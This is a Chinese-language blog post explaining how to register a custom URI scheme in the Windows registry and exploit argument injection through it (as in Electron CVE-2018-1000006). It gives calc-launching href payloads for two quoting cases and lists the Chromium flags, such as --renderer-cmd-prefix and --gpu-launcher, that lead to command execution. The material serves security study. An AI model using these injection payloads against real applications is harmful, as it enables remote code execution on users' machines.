URI Scheme注册伪协议实现远程命令执行
Windows配置注册表注册伪协议
1、新建伪协议项
WIN+R 输入regedit 打开注册表,在注册表HKEY_CLASSES_ROOT键中新建一个项,项的名字就是你伪协议的名字,例如我注册一个cmd协议。
然后不用管默认字符串值,新建一个叫URL Procotol的字符串值,值为空即可。
2、新建shell项
在cmd协议项中新建一个项 , 叫做shell,这个名称不能改。默认字符串值为空
3、新建open项
在shell项中新建一个项 , 叫做open,这个名称不能改。默认字符串值为空
4、新建command项
在open项中新建一个项 , 叫做command,这个名称不能改。默认字符串值为可执行文件路径和参数等
远程命令执行漏洞
根据这个地方的参数引号闭合情况去构造payload,类似SQL注入
- 是%1 则payload:href='cmd://123 --renderer-cmd-prefix="cmd.exe /c start calc.exe" '
- 要是“%1”则payload:href='cmd://123" --renderer-cmd-prefix="cmd.exe /c start calc.exe '
效果(备注这里需要使用IE内核测试):
其他引起RCE的参数如下:
- --renderer-cmd-prefix
- --gpu-launcher
- --utility-cmd-prefix
- --ppapi-plugin-launcher
- --nacl-gdb
- --ppapi-flash-path
- --ppapi-flash-args
参考文献:
Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古
转载于:https://www.cnblogs.com/KevinGeorge/p/10201295.html
URI Scheme注册伪协议实现远程命令执行相关推荐
- Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)
CVE-2020-1938 1.概述 1.1 tomcat概述 1.2 gostcat概述 - 漏洞概述 2. 漏洞成因 2.1 前置基础 2.1.1 Tomcat Connector(连接器) 2. ...
- Windows更新+中间人=远程命令执行
小飞 · 2015/11/26 15:57 0x00 Windows Server Update Services WSUS是Windows Server Update Services的简称.利用这 ...
- Firefox 31~34远程命令执行漏洞的分析
phith0n · 2015/03/26 17:47 0x00 前言 前段时间,二哥在很多浏览器中将脚本层面的漏洞提升为远程命令执行,几乎日遍市面上所有国产浏览器,这成为了许多人津津乐道的话题.确实, ...
- flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
- buuctf刷题9 (反序列化逃逸shtml-SSI远程命令执行idna与utf-8编码漏洞)
目录 安洵杯2019 easy_serialize_php (反序列化中的对象逃逸) [0CTF 2016]piapiapia(反序列化逃逸) [BJDCTF2020]EasySearch(Apach ...
- Fastjson远程命令执行漏洞总结
1.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符 ...
- 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析
本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...
- 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...
- windows远程命令执行
以下所有实验均在工作组环境下 psexec psexec.exe \\ip –accepteula -u username -p password program.exe psexec.exe \\h ...
最新文章
- 给 K8s API “做减法”:阿里巴巴云原生应用管理的挑战和实践
- LeetCode 773. 滑动谜题(BFS 地图状态转换的最短距离)
- Java-泛型T T与T的用法
- 多线程-AbstractQueuedSynchronizer(AQS)
- PHPMailer 报错:SMTP ERROR: Password command failed: 535 Login Fail
- 百度用户增长SQL面试题
- 云计算与云原生 — ETCD 数据库完全解析
- C语言之父丹尼斯·里奇:乔布斯脚下的巨人肩膀
- 微信公众号开发:账号申请与接入
- 在有C语言的基础上,快速学习python(C语言转战python)(python3)
- 全国计算机考试比省级的难吗,国考和省考考题的区别,难度差异很大吗?
- Linux下的文件及文件后缀名
- 电子邮件营销有哪些方法?
- 汽车4S店业务管理软件
- win7 visual studio code安装和使用
- 计算机管理usb出现问号,USB设备全部都是问号,求助?
- 你不知道的颠覆式创新者
- 一份游戏策划书的范例[转载]
- 360度全景图像制作
- 2022第七届少儿模特明星盛典 全国总决赛精彩直击
热门文章
- 数据恢复软件哪个好用比特数据恢复当仁不让
- css深入理解之overflow
- jQuery remove 内存 释放
- Spring.Net+NHibenate+Asp.Net mvc +ExtJs 系列 3 ----数据访问层
- Spring Web Flow实例教程
- 【springmvc+mybatis项目实战】杰信商贸-6.重点知识回顾
- Activity详细解释(生命周期、以各种方式启动Activity、状态保存,等完全退出)...
- 全球增长最快域名解析商Top10:DNSPod新网上榜
- hadoop配置文件默认配置
- python基础学习笔记(十三)